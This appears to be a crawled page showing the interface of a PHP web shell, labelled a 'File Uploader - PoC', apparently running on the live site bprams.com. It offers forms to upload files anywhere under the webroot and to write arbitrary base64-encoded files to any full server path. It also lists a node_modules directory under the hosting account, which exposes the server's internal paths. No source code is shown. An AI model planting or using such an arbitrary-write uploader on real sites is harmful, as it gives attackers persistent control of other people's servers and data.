PHP File Uploader - PoC [bprams.com]

Upload File

Target dir (relative to webroot):


File:


Write Arbitrary File (base64 encoded content)

Full path:


Content (base64):


Directory: /home/bprj6839/public_html//cuan.bprams.com/node_modules

[DIR] .bin
[FILE 75066B] .package-lock.json
[DIR] @adiwajshing
[DIR] @hapi
[DIR] @protobufjs
[DIR] @sideway
[DIR] @socket.io
[DIR] @tokenizer
[DIR] @types
[DIR] accepts
[DIR] ansi-regex
[DIR] ansi-styles
[DIR] array-flatten
[DIR] atomic-sleep
[DIR] axios
[DIR] base64id
[DIR] body-parser
[DIR] bytes
[DIR] call-bind
[DIR] camelcase
[DIR] cliui
[DIR] clone
[DIR] color-convert
[DIR] color-name
[DIR] content-disposition
[DIR] content-type
[DIR] cookie
[DIR] cookie-signature
[DIR] cors
[DIR] curve25519-js
[DIR] debug
[DIR] decamelize
[DIR] denque
[DIR] depd
[DIR] destroy
[DIR] dijkstrajs
[DIR] dotenv
[DIR] duplexify
[DIR] ee-first
[DIR] emoji-regex
[DIR] encode-utf8
[DIR] encodeurl
[DIR] end-of-stream
[DIR] engine.io
[DIR] engine.io-parser
[DIR] escape-html
[DIR] etag
[DIR] express
[DIR] express-validation
[DIR] express-validator
[DIR] fast-redact
[DIR] file-type
[DIR] finalhandler
[DIR] find-up
[DIR] follow-redirects
[DIR] forwarded
[DIR] fresh
[DIR] function-bind
[DIR] futoin-hkdf
[DIR] generate-function
[DIR] get-caller-file
[DIR] get-intrinsic
[DIR] git
[DIR] has
[DIR] has-symbols
[DIR] http-errors
[DIR] iconv-lite
[DIR] ieee754
[DIR] inherits
[DIR] ipaddr.js
[DIR] is-fullwidth-code-point
[DIR] is-property
[DIR] joi
[DIR] libsignal
[DIR] locate-path
[DIR] lodash
[DIR] long
[DIR] lru-cache
[DIR] media-typer
[DIR] merge-descriptors
[DIR] methods
[DIR] mime
[DIR] mime-db
[DIR] mime-types
[DIR] ms
[DIR] music-metadata
[DIR] mysql2
[DIR] named-placeholders
[DIR] negotiator
[DIR] node-cache
[DIR] object-assign
[DIR] object-inspect
[DIR] on-exit-leak-free
[DIR] on-finished
[DIR] once
[DIR] p-limit
[DIR] p-locate
[DIR] p-try
[DIR] parseurl
[DIR] path-exists
[DIR] path-to-regexp
[DIR] peek-readable
[DIR] pino
[DIR] pino-abstract-transport
[DIR] pino-std-serializers
[DIR] pngjs
[DIR] process-warning
[DIR] protobufjs
[DIR] proxy-addr
[DIR] qrcode
[DIR] qs
[DIR] quick-format-unescaped
[DIR] range-parser
[DIR] raw-body
[DIR] readable-stream
[DIR] readable-web-to-node-stream
[DIR] real-require
[DIR] require-directory
[DIR] require-main-filename
[DIR] safe-buffer
[DIR] safe-stable-stringify
[DIR] safer-buffer
[DIR] send
[DIR] seq-queue
[DIR] serve-static
[DIR] set-blocking
[DIR] setprototypeof
[DIR] side-channel
[DIR] socket.io
[DIR] socket.io-adapter
[DIR] socket.io-parser
[DIR] sonic-boom
[DIR] split2
[DIR] sqlstring
[DIR] statuses
[DIR] stream-shift
[DIR] string-width
[DIR] string_decoder
[DIR] strip-ansi
[DIR] strtok3
[DIR] thread-stream
[DIR] toidentifier
[DIR] token-types
[DIR] type-is
[DIR] unpipe
[DIR] util-deprecate
[DIR] utils-merge
[DIR] validator
[DIR] vary
[DIR] which-module
[DIR] wrap-ansi
[DIR] wrappy
[DIR] ws
[DIR] y18n
[DIR] yallist
[DIR] yargs
[DIR] yargs-parser